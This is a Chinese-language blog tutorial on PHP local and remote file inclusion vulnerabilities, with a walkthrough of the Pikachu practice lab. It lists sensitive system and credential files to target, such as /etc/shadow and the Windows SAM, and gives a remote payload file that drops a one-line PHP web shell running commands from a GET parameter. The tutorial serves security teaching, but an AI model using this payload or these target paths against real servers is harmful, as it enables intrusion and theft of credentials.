文件包含漏洞的学习(含pikachu练习)

文件包含漏洞概述

和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。

对于包含
以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含

漏洞成因

程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
以php,webapplication 中居多。jsp,asp,很少。
这与程序开发人员的水平无关,而问题在于语言设计的弊端。

漏洞的环境要求

allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据
allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件

常见文件包含函数


require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。
include(),找不到被包含的文件时只会产生警告,脚本将继续运行。
并不在意被包含的文件是什么类型,只要有php代码,都会被解析出来。
include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
require_once()与require()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。

文件包含利用


不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容为php则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行;

文件包含的特征


URL中出现以下参数时,联想到文件包含
?page=
?file= .
?home=

利用漏洞条件


1.included等函数通过动态变量的方式引入需要包含的文件;
2 用户能够控制该动态变量.
3. 被包含的文件可被访问

漏洞的分类

本地文件包含
仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。

远程文件包含漏洞
能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。
因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。
你可以通过“File Inclusion”对应的测试栏目,来进一步的了解该漏洞。

常用的本地文件绝对路径


这些路径不是绝对的!!!

Windows系统
c:\boot.ini // 查看系统版本
C:\Windows\System32\config\sam // 存储Windows系统初次安装的密码 c:\ProgramFiles\mysql\my.ini // MySQL配置 c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码 c:\windows\php.ini // php 配置信息

Linux/Unix系统、
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件
/etc/resolv.conf
/root/.ssh/known_hosts
/usr/local/app/php5/lib/php.ini // PHP相关配置
/etc/httpd/conf/httpd.conf // Apache配置文件
/etc/my.conf // mysql 配置文件
可以写入字典,爆破可返回包的长度来爆破站点的路径

pikachu本地文件包含

先在服务器本地新建个php文件:
98.php文件下的代码:<?php echo phpinfo();?>
在这里插入图片描述
下拉菜单选择查询是正常使用的
在这里插入图片描述
但是我们在本地新建了个php文件是不是可以通过参数的形式传递进去呢?
把上图的file1.php改为我们在服务器端新建的php文件98.php
在这里插入图片描述
因为后端php代码里使用了include包含了一个动态变量,这会产生文件包含漏洞

pikachu远程文件包含

点击做题界面显示叫你在php.ini打开allow_url_include
接下来我们就去打开呀
在这里插入图片描述
这里我们将箭头指的地方改成On在这里插入图片描述
就可以看到恢复正常了
在这里插入图片描述
在其他地址设置脚本
hack.txt:

<?php
    $myfile = fopen("hack.php", "w");
    $txt = '<?php system($_GET["hack"]);?>';
    fwrite($myfile, $txt);
    fclose($myfile);
?>

在这里插入图片描述

是GET的请求方式的话, 就可以直接通过URL来执行了:
http://192.168.43.147/pikachu-master/test/hack.txt
在这里插入图片描述
可以看到txt变成了php,就是把txt当成php解析
假如权限不够的话可能会出现警告

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值